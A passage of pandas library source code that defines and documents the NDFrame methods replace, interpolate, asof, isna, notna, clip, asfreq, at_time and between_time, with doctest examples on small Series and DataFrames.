value(s) in the dict are equal to the `value` parameter.
``s.replace({'a': None})`` is equivalent to
``s.replace(to_replace={'a': None}, value=None, method=None)``:
>>> s.replace({'a': None})
0 10
1 None
2 None
3 b
4 None
dtype: object
When ``value=None`` and `to_replace` is a scalar, list or
tuple, `replace` uses the method parameter (default 'pad') to do the
replacement. So this is why the 'a' values are being replaced by 10
in rows 1 and 2 and 'b' in row 4 in this case.
The command ``s.replace('a', None)`` is actually equivalent to
``s.replace(to_replace='a', value=None, method='pad')``:
>>> s.replace('a', None)
0 10
1 10
2 10
3 b
4 b
dtype: object
"""
    @Appender(_shared_docs["replace"] % _shared_doc_kwargs)
    def replace(
        self,
        to_replace=None,
        value=None,
        inplace=False,
        limit=None,
        regex=False,
        method="pad",
    ):
        # Reject types that cannot describe a replacement target up front.
        if not (
            is_scalar(to_replace)
            or isinstance(to_replace, pd.Series)
            or is_re_compilable(to_replace)
            or is_list_like(to_replace)
        ):
            raise TypeError(
                "Expecting 'to_replace' to be either a scalar, array-like, "
                "dict or None, got invalid type "
                f"{repr(type(to_replace).__name__)}"
            )
        inplace = validate_bool_kwarg(inplace, "inplace")
        if not is_bool(regex) and to_replace is not None:
            raise AssertionError("'to_replace' must be 'None' if 'regex' is not a bool")
        self._consolidate_inplace()
        if value is None:
            # passing a single value that is scalar like
            # when value is None (GH5319), for compat
            if not is_dict_like(to_replace) and not is_dict_like(regex):
                to_replace = [to_replace]
            if isinstance(to_replace, (tuple, list)):
                # Scalar/list targets without a value: fill matches via
                # the ``method`` (pad/bfill) path instead.
                if isinstance(self, ABCDataFrame):
                    return self.apply(
                        _single_replace, args=(to_replace, method, inplace, limit)
                    )
                return _single_replace(self, to_replace, method, inplace, limit)
            if not is_dict_like(to_replace):
                if not is_dict_like(regex):
                    raise TypeError(
                        'If "to_replace" and "value" are both None '
                        'and "to_replace" is not a list, then '
                        "regex must be a mapping"
                    )
                # ``regex`` carries the mapping; treat its keys as patterns.
                to_replace = regex
                regex = True
            items = list(to_replace.items())
            keys, values = zip(*items) if items else ([], [])
            are_mappings = [is_dict_like(v) for v in values]
            if any(are_mappings):
                if not all(are_mappings):
                    raise TypeError(
                        "If a nested mapping is passed, all values "
                        "of the top level mapping must be mappings"
                    )
                # passed a nested dict/Series
                # Split {col: {old: new}} into parallel per-column
                # to_replace/value mappings, then recurse once.
                to_rep_dict = {}
                value_dict = {}
                for k, v in items:
                    keys, values = list(zip(*v.items())) or ([], [])
                    to_rep_dict[k] = list(keys)
                    value_dict[k] = list(values)
                to_replace, value = to_rep_dict, value_dict
            else:
                # Flat mapping {old: new}: keys become targets, values the
                # replacements.
                to_replace, value = keys, values
            return self.replace(
                to_replace, value, inplace=inplace, limit=limit, regex=regex
            )
        else:
            # need a non-zero len on all axes
            if not self.size:
                return self
            new_data = self._data
            if is_dict_like(to_replace):
                if is_dict_like(value):  # {'A' : NA} -> {'A' : 0}
                    res = self if inplace else self.copy()
                    for c, src in to_replace.items():
                        if c in value and c in self:
                            # object conversion is handled in
                            # series.replace which is called recursively
                            res[c] = res[c].replace(
                                to_replace=src,
                                value=value[c],
                                inplace=False,
                                regex=regex,
                            )
                    return None if inplace else res
                # {'A': NA} -> 0
                elif not is_list_like(value):
                    keys = [(k, src) for k, src in to_replace.items() if k in self]
                    keys_len = len(keys) - 1
                    for i, (k, src) in enumerate(keys):
                        # only downcast/convert once, on the last column
                        convert = i == keys_len
                        new_data = new_data.replace(
                            to_replace=src,
                            value=value,
                            filter=[k],
                            inplace=inplace,
                            regex=regex,
                            convert=convert,
                        )
                else:
                    raise TypeError("value argument must be scalar, dict, or Series")
            elif is_list_like(to_replace):  # [NA, ''] -> [0, 'missing']
                if is_list_like(value):
                    if len(to_replace) != len(value):
                        raise ValueError(
                            f"Replacement lists must match in length. "
                            f"Expecting {len(to_replace)} got {len(value)} "
                        )
                    new_data = self._data.replace_list(
                        src_list=to_replace,
                        dest_list=value,
                        inplace=inplace,
                        regex=regex,
                    )
                else:  # [NA, ''] -> 0
                    new_data = self._data.replace(
                        to_replace=to_replace, value=value, inplace=inplace, regex=regex
                    )
            elif to_replace is None:
                # Pure-regex form: the pattern(s) live in ``regex``.
                if not (
                    is_re_compilable(regex)
                    or is_list_like(regex)
                    or is_dict_like(regex)
                ):
                    raise TypeError(
                        f"'regex' must be a string or a compiled regular expression "
                        f"or a list or dict of strings or regular expressions, "
                        f"you passed a {repr(type(regex).__name__)}"
                    )
                return self.replace(
                    regex, value, inplace=inplace, limit=limit, regex=True
                )
            else:
                # dest iterable dict-like
                if is_dict_like(value):  # NA -> {'A' : 0, 'B' : -1}
                    new_data = self._data
                    for k, v in value.items():
                        if k in self:
                            new_data = new_data.replace(
                                to_replace=to_replace,
                                value=v,
                                filter=[k],
                                inplace=inplace,
                                regex=regex,
                            )
                elif not is_list_like(value):  # NA -> 0
                    new_data = self._data.replace(
                        to_replace=to_replace, value=value, inplace=inplace, regex=regex
                    )
                else:
                    raise TypeError(
                        f'Invalid "to_replace" type: {repr(type(to_replace).__name__)}'
                    )
        if inplace:
            self._update_inplace(new_data)
        else:
            return self._constructor(new_data).__finalize__(self)
_shared_docs[
"interpolate"
] = """
Please note that only ``method='linear'`` is supported for
DataFrame/Series with a MultiIndex.
Parameters
----------
method : str, default 'linear'
Interpolation technique to use. One of:
* 'linear': Ignore the index and treat the values as equally
spaced. This is the only method supported on MultiIndexes.
* 'time': Works on daily and higher resolution data to interpolate
given length of interval.
* 'index', 'values': use the actual numerical values of the index.
* 'pad': Fill in NaNs using existing values.
* 'nearest', 'zero', 'slinear', 'quadratic', 'cubic', 'spline',
'barycentric', 'polynomial': Passed to
`scipy.interpolate.interp1d`. These methods use the numerical
values of the index. Both 'polynomial' and 'spline' require that
you also specify an `order` (int), e.g.
``df.interpolate(method='polynomial', order=5)``.
* 'krogh', 'piecewise_polynomial', 'spline', 'pchip', 'akima':
Wrappers around the SciPy interpolation methods of similar
names. See `Notes`.
* 'from_derivatives': Refers to
`scipy.interpolate.BPoly.from_derivatives` which
replaces 'piecewise_polynomial' interpolation method in
scipy 0.18.
axis : {0 or 'index', 1 or 'columns', None}, default None
Axis to interpolate along.
limit : int, optional
Maximum number of consecutive NaNs to fill. Must be greater than
0.
inplace : bool, default False
Update the data in place if possible.
limit_direction : {'forward', 'backward', 'both'}, default 'forward'
If limit is specified, consecutive NaNs will be filled in this
direction.
limit_area : {`None`, 'inside', 'outside'}, default None
If limit is specified, consecutive NaNs will be filled with this
restriction.
* ``None``: No fill restriction.
* 'inside': Only fill NaNs surrounded by valid values
(interpolate).
* 'outside': Only fill NaNs outside valid values (extrapolate).
.. versionadded:: 0.23.0
downcast : optional, 'infer' or None, defaults to None
Downcast dtypes if possible.
**kwargs
Keyword arguments to pass on to the interpolating function.
Returns
-------
Series or DataFrame
Returns the same object type as the caller, interpolated at
some or all ``NaN`` values.
See Also
--------
fillna : Fill missing values using different methods.
scipy.interpolate.Akima1DInterpolator : Piecewise cubic polynomials
(Akima interpolator).
scipy.interpolate.BPoly.from_derivatives : Piecewise polynomial in the
Bernstein basis.
scipy.interpolate.interp1d : Interpolate a 1-D function.
scipy.interpolate.KroghInterpolator : Interpolate polynomial (Krogh
interpolator).
scipy.interpolate.PchipInterpolator : PCHIP 1-d monotonic cubic
interpolation.
scipy.interpolate.CubicSpline : Cubic spline data interpolator.
Notes
-----
The 'krogh', 'piecewise_polynomial', 'spline', 'pchip' and 'akima'
methods are wrappers around the respective SciPy implementations of
similar names. These use the actual numerical values of the index.
For more information on their behavior, see the
`SciPy documentation
<https://docs.scipy.org/doc/scipy/reference/interpolate.html#univariate-interpolation>`__
and `SciPy tutorial
<https://docs.scipy.org/doc/scipy/reference/tutorial/interpolate.html>`__.
Examples
--------
Filling in ``NaN`` in a :class:`~pandas.Series` via linear
interpolation.
>>> s = pd.Series([0, 1, np.nan, 3])
>>> s
0 0.0
1 1.0
2 NaN
3 3.0
dtype: float64
>>> s.interpolate()
0 0.0
1 1.0
2 2.0
3 3.0
dtype: float64
Filling in ``NaN`` in a Series by padding, but filling at most two
consecutive ``NaN`` at a time.
>>> s = pd.Series([np.nan, "single_one", np.nan,
... "fill_two_more", np.nan, np.nan, np.nan,
... 4.71, np.nan])
>>> s
0 NaN
1 single_one
2 NaN
3 fill_two_more
4 NaN
5 NaN
6 NaN
7 4.71
8 NaN
dtype: object
>>> s.interpolate(method='pad', limit=2)
0 NaN
1 single_one
2 single_one
3 fill_two_more
4 fill_two_more
5 fill_two_more
6 NaN
7 4.71
8 4.71
dtype: object
Filling in ``NaN`` in a Series via polynomial interpolation or splines:
Both 'polynomial' and 'spline' methods require that you also specify
an ``order`` (int).
>>> s = pd.Series([0, 2, np.nan, 8])
>>> s.interpolate(method='polynomial', order=2)
0 0.000000
1 2.000000
2 4.666667
3 8.000000
dtype: float64
Fill the DataFrame forward (that is, going down) along each column
using linear interpolation.
Note how the last entry in column 'a' is interpolated differently,
because there is no entry after it to use for interpolation.
Note how the first entry in column 'b' remains ``NaN``, because there
is no entry before it to use for interpolation.
>>> df = pd.DataFrame([(0.0, np.nan, -1.0, 1.0),
... (np.nan, 2.0, np.nan, np.nan),
... (2.0, 3.0, np.nan, 9.0),
... (np.nan, 4.0, -4.0, 16.0)],
... columns=list('abcd'))
>>> df
a b c d
0 0.0 NaN -1.0 1.0
1 NaN 2.0 NaN NaN
2 2.0 3.0 NaN 9.0
3 NaN 4.0 -4.0 16.0
>>> df.interpolate(method='linear', limit_direction='forward', axis=0)
a b c d
0 0.0 NaN -1.0 1.0
1 1.0 2.0 -2.0 5.0
2 2.0 3.0 -3.0 9.0
3 2.0 4.0 -4.0 16.0
Using polynomial interpolation.
>>> df['d'].interpolate(method='polynomial', order=2)
0 1.0
1 4.0
2 9.0
3 16.0
Name: d, dtype: float64
"""
    @Appender(_shared_docs["interpolate"] % _shared_doc_kwargs)
    def interpolate(
        self,
        method="linear",
        axis=0,
        limit=None,
        inplace=False,
        limit_direction="forward",
        limit_area=None,
        downcast=None,
        **kwargs,
    ):
        """
        Interpolate values according to different methods.
        """
        inplace = validate_bool_kwarg(inplace, "inplace")
        axis = self._get_axis_number(axis)
        # Interpolation is implemented along axis 0 internally; for axis=1 we
        # operate on the transpose and transpose the result back at the end.
        if axis == 0:
            ax = self._info_axis_name
            _maybe_transposed_self = self
        elif axis == 1:
            _maybe_transposed_self = self.T
            ax = 1
        ax = _maybe_transposed_self._get_axis_number(ax)
        # ``alt_ax`` is the axis whose labels supply the x-coordinates.
        if _maybe_transposed_self.ndim == 2:
            alt_ax = 1 - ax
        else:
            alt_ax = ax
        if isinstance(_maybe_transposed_self.index, MultiIndex) and method != "linear":
            raise ValueError(
                "Only `method=linear` interpolation is supported on MultiIndexes."
            )
        # An all-object-dtype frame has nothing numeric to interpolate.
        if _maybe_transposed_self._data.get_dtype_counts().get("object") == len(
            _maybe_transposed_self.T
        ):
            raise TypeError(
                "Cannot interpolate with all object-dtype columns "
                "in the DataFrame. Try setting at least one "
                "column to a numeric dtype."
            )
        # create/use the index
        if method == "linear":
            # prior default: interpolate on positions, ignoring index values
            index = np.arange(len(_maybe_transposed_self._get_axis(alt_ax)))
        else:
            index = _maybe_transposed_self._get_axis(alt_ax)
            # These methods accept any index type; everything else needs a
            # numeric or datetime-like index to provide x-coordinates.
            methods = {"index", "values", "nearest", "time"}
            is_numeric_or_datetime = (
                is_numeric_dtype(index)
                or is_datetime64_any_dtype(index)
                or is_timedelta64_dtype(index)
            )
            if method not in methods and not is_numeric_or_datetime:
                raise ValueError(
                    "Index column must be numeric or datetime type when "
                    f"using {method} method other than linear. "
                    "Try setting a numeric or datetime index column before "
                    "interpolating."
                )
        if isna(index).any():
            raise NotImplementedError(
                "Interpolation with NaNs in the index "
                "has not been implemented. Try filling "
                "those NaNs before interpolating."
            )
        data = _maybe_transposed_self._data
        new_data = data.interpolate(
            method=method,
            axis=ax,
            index=index,
            limit=limit,
            limit_direction=limit_direction,
            limit_area=limit_area,
            inplace=inplace,
            downcast=downcast,
            **kwargs,
        )
        if inplace:
            if axis == 1:
                # Undo the transpose taken above before writing back.
                new_data = self._constructor(new_data).T._data
            self._update_inplace(new_data)
        else:
            res = self._constructor(new_data).__finalize__(self)
            if axis == 1:
                res = res.T
            return res
    # ----------------------------------------------------------------------
    # Timeseries methods
    def asof(self, where, subset=None):
        """
        Return the last row(s) without any NaNs before `where`.
        The last row (for each element in `where`, if list) without any
        NaN is taken.
        In case of a :class:`~pandas.DataFrame`, the last row without NaN
        considering only the subset of columns (if not `None`)
        If there is no good value, NaN is returned for a Series or
        a Series of NaN values for a DataFrame
        Parameters
        ----------
        where : date or array-like of dates
            Date(s) before which the last row(s) are returned.
        subset : str or array-like of str, default `None`
            For DataFrame, if not `None`, only use these columns to
            check for NaNs.
        Returns
        -------
        scalar, Series, or DataFrame
            The return can be:
            * scalar : when `self` is a Series and `where` is a scalar
            * Series: when `self` is a Series and `where` is an array-like,
              or when `self` is a DataFrame and `where` is a scalar
            * DataFrame : when `self` is a DataFrame and `where` is an
              array-like
            Return scalar, Series, or DataFrame.
        See Also
        --------
        merge_asof : Perform an asof merge. Similar to left join.
        Notes
        -----
        Dates are assumed to be sorted. Raises if this is not the case.
        Examples
        --------
        A Series and a scalar `where`.
        >>> s = pd.Series([1, 2, np.nan, 4], index=[10, 20, 30, 40])
        >>> s
        10    1.0
        20    2.0
        30    NaN
        40    4.0
        dtype: float64
        >>> s.asof(20)
        2.0
        For a sequence `where`, a Series is returned. The first value is
        NaN, because the first element of `where` is before the first
        index value.
        >>> s.asof([5, 20])
        5     NaN
        20    2.0
        dtype: float64
        Missing values are not considered. The following is ``2.0``, not
        NaN, even though NaN is at the index location for ``30``.
        >>> s.asof(30)
        2.0
        Take all columns into consideration
        >>> df = pd.DataFrame({'a': [10, 20, 30, 40, 50],
        ...                    'b': [None, None, None, None, 500]},
        ...                   index=pd.DatetimeIndex(['2018-02-27 09:01:00',
        ...                                           '2018-02-27 09:02:00',
        ...                                           '2018-02-27 09:03:00',
        ...                                           '2018-02-27 09:04:00',
        ...                                           '2018-02-27 09:05:00']))
        >>> df.asof(pd.DatetimeIndex(['2018-02-27 09:03:30',
        ...                           '2018-02-27 09:04:30']))
                              a   b
        2018-02-27 09:03:30 NaN NaN
        2018-02-27 09:04:30 NaN NaN
        Take a single column into consideration
        >>> df.asof(pd.DatetimeIndex(['2018-02-27 09:03:30',
        ...                           '2018-02-27 09:04:30']),
        ...         subset=['a'])
                                a   b
        2018-02-27 09:03:30  30.0 NaN
        2018-02-27 09:04:30  40.0 NaN
        """
        if isinstance(where, str):
            where = Timestamp(where)
        if not self.index.is_monotonic:
            raise ValueError("asof requires a sorted index")
        is_series = isinstance(self, ABCSeries)
        if is_series:
            if subset is not None:
                raise ValueError("subset is not valid for Series")
        else:
            # For DataFrames, default to checking NaNs across all columns.
            if subset is None:
                subset = self.columns
            if not is_list_like(subset):
                subset = [subset]
        is_list = is_list_like(where)
        if not is_list:
            # Scalar ``where``: handle the before-start case and the fast
            # Series-only path below.
            start = self.index[0]
            if isinstance(self.index, PeriodIndex):
                where = Period(where, freq=self.index.freq)
            if where < start:
                # ``where`` precedes all data: no row qualifies.
                if not is_series:
                    from pandas import Series
                    return Series(index=self.columns, name=where, dtype=np.float64)
                return np.nan
            # It's always much faster to use a *while* loop here for
            # Series than pre-computing all the NAs. However a
            # *while* loop is extremely expensive for DataFrame
            # so we later pre-compute all the NAs and use the same
            # code path whether *where* is a scalar or list.
            # See PR: https://github.com/pandas-dev/pandas/pull/14476
            if is_series:
                loc = self.index.searchsorted(where, side="right")
                if loc > 0:
                    loc -= 1
                values = self._values
                # Walk backwards past NaNs to the last valid observation.
                while loc > 0 and isna(values[loc]):
                    loc -= 1
                return values[loc]
        if not isinstance(where, Index):
            where = Index(where) if is_list else Index([where])
        # Per-row NaN indicator (restricted to ``subset`` for DataFrames).
        nulls = self.isna() if is_series else self[subset].isna().any(1)
        if nulls.all():
            # Every row has a NaN: nothing qualifies for any ``where``.
            if is_series:
                return self._constructor(np.nan, index=where, name=self.name)
            elif is_list:
                from pandas import DataFrame
                return DataFrame(np.nan, index=where, columns=self.columns)
            else:
                from pandas import Series
                return Series(np.nan, index=self.columns, name=where[0])
        locs = self.index.asof_locs(where, ~(nulls.values))
        # mask the missing (asof_locs returns -1 where no row qualifies)
        missing = locs == -1
        data = self.take(locs)
        data.index = where
        data.loc[missing] = np.nan
        return data if is_list else data.iloc[-1]
# ----------------------------------------------------------------------
# Action Methods
_shared_docs[
"isna"
] = """
Detect missing values.
Return a boolean same-sized object indicating if the values are NA.
NA values, such as None or :attr:`numpy.NaN`, gets mapped to True
values.
Everything else gets mapped to False values. Characters such as empty
strings ``''`` or :attr:`numpy.inf` are not considered NA values
(unless you set ``pandas.options.mode.use_inf_as_na = True``).
Returns
-------
%(klass)s
Mask of bool values for each element in %(klass)s that
indicates whether an element is not an NA value.
See Also
--------
%(klass)s.isnull : Alias of isna.
%(klass)s.notna : Boolean inverse of isna.
%(klass)s.dropna : Omit axes labels with missing values.
isna : Top-level isna.
Examples
--------
Show which entries in a DataFrame are NA.
>>> df = pd.DataFrame({'age': [5, 6, np.NaN],
... 'born': [pd.NaT, pd.Timestamp('1939-05-27'),
... pd.Timestamp('1940-04-25')],
... 'name': ['Alfred', 'Batman', ''],
... 'toy': [None, 'Batmobile', 'Joker']})
>>> df
age born name toy
0 5.0 NaT Alfred None
1 6.0 1939-05-27 Batman Batmobile
2 NaN 1940-04-25 Joker
>>> df.isna()
age born name toy
0 False True False True
1 False False False False
2 True False False False
Show which entries in a Series are NA.
>>> ser = pd.Series([5, 6, np.NaN])
>>> ser
0 5.0
1 6.0
2 NaN
dtype: float64
>>> ser.isna()
0 False
1 False
2 True
dtype: bool
"""
@Appender(_shared_docs["isna"] % _shared_doc_kwargs)
def isna(self: FrameOrSeries) -> FrameOrSeries:
return isna(self).__finalize__(self)
@Appender(_shared_docs["isna"] % _shared_doc_kwargs)
def isnull(self: FrameOrSeries) -> FrameOrSeries:
return isna(self).__finalize__(self)
_shared_docs[
"notna"
] = """
Detect existing (non-missing) values.
Return a boolean same-sized object indicating if the values are not NA.
Non-missing values get mapped to True. Characters such as empty
strings ``''`` or :attr:`numpy.inf` are not considered NA values
(unless you set ``pandas.options.mode.use_inf_as_na = True``).
NA values, such as None or :attr:`numpy.NaN`, get mapped to False
values.
Returns
-------
%(klass)s
Mask of bool values for each element in %(klass)s that
indicates whether an element is not an NA value.
See Also
--------
%(klass)s.notnull : Alias of notna.
%(klass)s.isna : Boolean inverse of notna.
%(klass)s.dropna : Omit axes labels with missing values.
notna : Top-level notna.
Examples
--------
Show which entries in a DataFrame are not NA.
>>> df = pd.DataFrame({'age': [5, 6, np.NaN],
... 'born': [pd.NaT, pd.Timestamp('1939-05-27'),
... pd.Timestamp('1940-04-25')],
... 'name': ['Alfred', 'Batman', ''],
... 'toy': [None, 'Batmobile', 'Joker']})
>>> df
age born name toy
0 5.0 NaT Alfred None
1 6.0 1939-05-27 Batman Batmobile
2 NaN 1940-04-25 Joker
>>> df.notna()
age born name toy
0 True False True False
1 True True True True
2 False True True True
Show which entries in a Series are not NA.
>>> ser = pd.Series([5, 6, np.NaN])
>>> ser
0 5.0
1 6.0
2 NaN
dtype: float64
>>> ser.notna()
0 True
1 True
2 False
dtype: bool
"""
@Appender(_shared_docs["notna"] % _shared_doc_kwargs)
def notna(self: FrameOrSeries) -> FrameOrSeries:
return notna(self).__finalize__(self)
@Appender(_shared_docs["notna"] % _shared_doc_kwargs)
def notnull(self: FrameOrSeries) -> FrameOrSeries:
return notna(self).__finalize__(self)
def _clip_with_scalar(self, lower, upper, inplace: bool_t = False):
if (lower is not None and np.any(isna(lower))) or (
upper is not None and np.any(isna(upper))
):
raise ValueError("Cannot use an NA value as a clip threshold")
result = self
mask = isna(self.values)
with np.errstate(all="ignore"):
if upper is not None:
subset = self.to_numpy() <= upper
result = result.where(subset, upper, axis=None, inplace=False)
if lower is not None:
subset = self.to_numpy() >= lower
result = result.where(subset, lower, axis=None, inplace=False)
if np.any(mask):
result[mask] = np.nan
if inplace:
self._update_inplace(result)
else:
return result
    def _clip_with_one_bound(self, threshold, method, axis, inplace):
        # Clip against a single bound. ``method`` is a bound comparison
        # method of ``self``: ``self.le`` for an upper bound, ``self.ge``
        # for a lower bound.
        if axis is not None:
            axis = self._get_axis_number(axis)
        # method is self.le for upper bound and self.ge for lower bound
        if is_scalar(threshold) and is_number(threshold):
            # Fast path: a plain numeric scalar uses the scalar clipper.
            if method.__name__ == "le":
                return self._clip_with_scalar(None, threshold, inplace=inplace)
            return self._clip_with_scalar(threshold, None, inplace=inplace)
        # Keep values that satisfy the bound; NA positions are kept as-is.
        subset = method(threshold, axis=axis) | isna(self)
        # GH #15390
        # In order for where method to work, the threshold must
        # be transformed to NDFrame from other array like structure.
        if (not isinstance(threshold, ABCSeries)) and is_list_like(threshold):
            if isinstance(self, ABCSeries):
                threshold = self._constructor(threshold, index=self.index)
            else:
                threshold = _align_method_FRAME(self, threshold, axis, flex=None)[1]
        return self.where(subset, threshold, axis=axis, inplace=inplace)
    def clip(
        self: FrameOrSeries,
        lower=None,
        upper=None,
        axis=None,
        inplace: bool_t = False,
        *args,
        **kwargs,
    ) -> FrameOrSeries:
        """
        Trim values at input threshold(s).
        Assigns values outside boundary to boundary values. Thresholds
        can be singular values or array like, and in the latter case
        the clipping is performed element-wise in the specified axis.
        Parameters
        ----------
        lower : float or array_like, default None
            Minimum threshold value. All values below this
            threshold will be set to it.
        upper : float or array_like, default None
            Maximum threshold value. All values above this
            threshold will be set to it.
        axis : int or str axis name, optional
            Align object with lower and upper along the given axis.
        inplace : bool, default False
            Whether to perform the operation in place on the data.
            .. versionadded:: 0.21.0
        *args, **kwargs
            Additional keywords have no effect but might be accepted
            for compatibility with numpy.
        Returns
        -------
        Series or DataFrame
            Same type as calling object with the values outside the
            clip boundaries replaced.
        Examples
        --------
        >>> data = {'col_0': [9, -3, 0, -1, 5], 'col_1': [-2, -7, 6, 8, -5]}
        >>> df = pd.DataFrame(data)
        >>> df
           col_0  col_1
        0      9     -2
        1     -3     -7
        2      0      6
        3     -1      8
        4      5     -5
        Clips per column using lower and upper thresholds:
        >>> df.clip(-4, 6)
           col_0  col_1
        0      6     -2
        1     -3     -4
        2      0      6
        3     -1      6
        4      5     -4
        Clips using specific lower and upper thresholds per column element:
        >>> t = pd.Series([2, -4, -1, 6, 3])
        >>> t
        0    2
        1   -4
        2   -1
        3    6
        4    3
        dtype: int64
        >>> df.clip(t, t + 4, axis=0)
           col_0  col_1
        0      6      2
        1     -3     -4
        2      0      3
        3      6      8
        4      5      3
        """
        inplace = validate_bool_kwarg(inplace, "inplace")
        axis = nv.validate_clip_with_axis(axis, args, kwargs)
        if axis is not None:
            axis = self._get_axis_number(axis)
        # GH 17276
        # numpy doesn't like NaN as a clip value
        # so ignore
        # GH 19992
        # numpy doesn't drop a list-like bound containing NaN
        if not is_list_like(lower) and np.any(isna(lower)):
            lower = None
        if not is_list_like(upper) and np.any(isna(upper)):
            upper = None
        # GH 2747 (arguments were reversed): swap scalar bounds if needed
        if lower is not None and upper is not None:
            if is_scalar(lower) and is_scalar(upper):
                lower, upper = min(lower, upper), max(lower, upper)
        # fast-path for scalars
        if (lower is None or (is_scalar(lower) and is_number(lower))) and (
            upper is None or (is_scalar(upper) and is_number(upper))
        ):
            return self._clip_with_scalar(lower, upper, inplace=inplace)
        result = self
        if lower is not None:
            result = result._clip_with_one_bound(
                lower, method=self.ge, axis=axis, inplace=inplace
            )
        if upper is not None:
            if inplace:
                # The lower clip above mutated ``self``; restart from it so
                # the upper clip sees the updated values.
                result = self
            result = result._clip_with_one_bound(
                upper, method=self.le, axis=axis, inplace=inplace
            )
        return result
_shared_docs[
"groupby"
] = """
Group %(klass)s using a mapper or by a Series of columns.
A groupby operation involves some combination of splitting the
object, applying a function, and combining the results. This can be
used to group large amounts of data and compute operations on these
groups.
Parameters
----------
by : mapping, function, label, or list of labels
Used to determine the groups for the groupby.
If ``by`` is a function, it's called on each value of the object's
index. If a dict or Series is passed, the Series or dict VALUES
will be used to determine the groups (the Series' values are first
aligned; see ``.align()`` method). If an ndarray is passed, the
values are used as-is determine the groups. A label or list of
labels may be passed to group by the columns in ``self``. Notice
that a tuple is interpreted as a (single) key.
axis : {0 or 'index', 1 or 'columns'}, default 0
Split along rows (0) or columns (1).
level : int, level name, or sequence of such, default None
If the axis is a MultiIndex (hierarchical), group by a particular
level or levels.
as_index : bool, default True
For aggregated output, return object with group labels as the
index. Only relevant for DataFrame input. as_index=False is
effectively "SQL-style" grouped output.
sort : bool, default True
Sort group keys. Get better performance by turning this off.
Note this does not influence the order of observations within each
group. Groupby preserves the order of rows within each group.
group_keys : bool, default True
When calling apply, add group keys to index to identify pieces.
squeeze : bool, default False
Reduce the dimensionality of the return type if possible,
otherwise return a consistent type.
observed : bool, default False
This only applies if any of the groupers are Categoricals.
If True: only show observed values for categorical groupers.
If False: show all values for categorical groupers.
.. versionadded:: 0.23.0
Returns
-------
%(klass)sGroupBy
Returns a groupby object that contains information about the groups.
See Also
--------
resample : Convenience method for frequency conversion and resampling
of time series.
Notes
-----
See the `user guide
<https://pandas.pydata.org/pandas-docs/stable/groupby.html>`_ for more.
"""
def asfreq(
self: FrameOrSeries,
freq,
method=None,
how: Optional[str] = None,
normalize: bool_t = False,
fill_value=None,
) -> FrameOrSeries:
"""
Convert TimeSeries to specified frequency.
Optionally provide filling method to pad/backfill missing values.
Returns the original data conformed to a new index with the specified
frequency. ``resample`` is more appropriate if an operation, such as
summarization, is necessary to represent the data at the new frequency.
Parameters
----------
freq : DateOffset or str
method : {'backfill'/'bfill', 'pad'/'ffill'}, default None
Method to use for filling holes in reindexed Series (note this
does not fill NaNs that already were present):
* 'pad' / 'ffill': propagate last valid observation forward to next
valid
* 'backfill' / 'bfill': use NEXT valid observation to fill.
how : {'start', 'end'}, default end
For PeriodIndex only (see PeriodIndex.asfreq).
normalize : bool, default False
Whether to reset output index to midnight.
fill_value : scalar, optional
Value to use for missing values, applied during upsampling (note
this does not fill NaNs that already were present).
Returns
-------
converted : same type as caller
See Also
--------
reindex
Notes
-----
To learn more about the frequency strings, please see `this link
<https://pandas.pydata.org/pandas-docs/stable/user_guide/timeseries.html#offset-aliases>`__.
Examples
--------
Start by creating a series with 4 one minute timestamps.
>>> index = pd.date_range('1/1/2000', periods=4, freq='T')
>>> series = pd.Series([0.0, None, 2.0, 3.0], index=index)
>>> df = pd.DataFrame({'s':series})
>>> df
s
2000-01-01 00:00:00 0.0
2000-01-01 00:01:00 NaN
2000-01-01 00:02:00 2.0
2000-01-01 00:03:00 3.0
Upsample the series into 30 second bins.
>>> df.asfreq(freq='30S')
s
2000-01-01 00:00:00 0.0
2000-01-01 00:00:30 NaN
2000-01-01 00:01:00 NaN
2000-01-01 00:01:30 NaN
2000-01-01 00:02:00 2.0
2000-01-01 00:02:30 NaN
2000-01-01 00:03:00 3.0
Upsample again, providing a ``fill value``.
>>> df.asfreq(freq='30S', fill_value=9.0)
s
2000-01-01 00:00:00 0.0
2000-01-01 00:00:30 9.0
2000-01-01 00:01:00 NaN
2000-01-01 00:01:30 9.0
2000-01-01 00:02:00 2.0
2000-01-01 00:02:30 9.0
2000-01-01 00:03:00 3.0
Upsample again, providing a ``method``.
>>> df.asfreq(freq='30S', method='bfill')
s
2000-01-01 00:00:00 0.0
2000-01-01 00:00:30 NaN
2000-01-01 00:01:00 NaN
2000-01-01 00:01:30 2.0
2000-01-01 00:02:00 2.0
2000-01-01 00:02:30 3.0
2000-01-01 00:03:00 3.0
"""
from pandas.core.resample import asfreq
return asfreq(
self,
freq,
method=method,
how=how,
normalize=normalize,
fill_value=fill_value,
)
def at_time(
self: FrameOrSeries, time, asof: bool_t = False, axis=None
) -> FrameOrSeries:
"""
Select values at particular time of day (e.g., 9:30AM).
Parameters
----------
time : datetime.time or str
axis : {0 or 'index', 1 or 'columns'}, default 0
.. versionadded:: 0.24.0
Returns
-------
Series or DataFrame
Raises
------
TypeError
If the index is not a :class:`DatetimeIndex`
See Also
--------
between_time : Select values between particular times of the day.
first : Select initial periods of time series based on a date offset.
last : Select final periods of time series based on a date offset.
DatetimeIndex.indexer_at_time : Get just the index locations for
values at particular time of the day.
Examples
--------
>>> i = pd.date_range('2018-04-09', periods=4, freq='12H')
>>> ts = pd.DataFrame({'A': [1, 2, 3, 4]}, index=i)
>>> ts
A
2018-04-09 00:00:00 1
2018-04-09 12:00:00 2
2018-04-10 00:00:00 3
2018-04-10 12:00:00 4
>>> ts.at_time('12:00')
A
2018-04-09 12:00:00 2
2018-04-10 12:00:00 4
"""
if axis is None:
axis = self._stat_axis_number
axis = self._get_axis_number(axis)
index = self._get_axis(axis)
try:
indexer = index.indexer_at_time(time, asof=asof)
except AttributeError as err:
raise TypeError("Index must be DatetimeIndex") from err
return self._take_with_is_copy(indexer, axis=axis)
def between_time(
self: FrameOrSeries,
start_time,
end_time,
include_start: bool_t = True,
include_end: bool_t = True,
axis=None,
) -> FrameOrSeries:
"""
Select values between particular times of the day (e.g., 9:00-9:30 AM).
By setting ``start_time`` to be later than ``end_time``,
you can get the times that are *not* between the two times.
Parameters
----------
start_time : datetime.time or str
Initial time as a time filter limit.
end_time : datetime.time or str
End time as a time filter limit.
include_start : bool, default True
Whether the start time needs to be included in the result.
include_end : bool, default True
Whether the end time needs to be included in the result.
axis : {0 or 'index', 1 or 'columns'}, default 0
Determine range time on index or columns value.
.. versionadded:: 0.24.0
Returns
-------
Series or DataFrame
Data from the original object filtered to the specified dates range.
Raises
------
TypeError
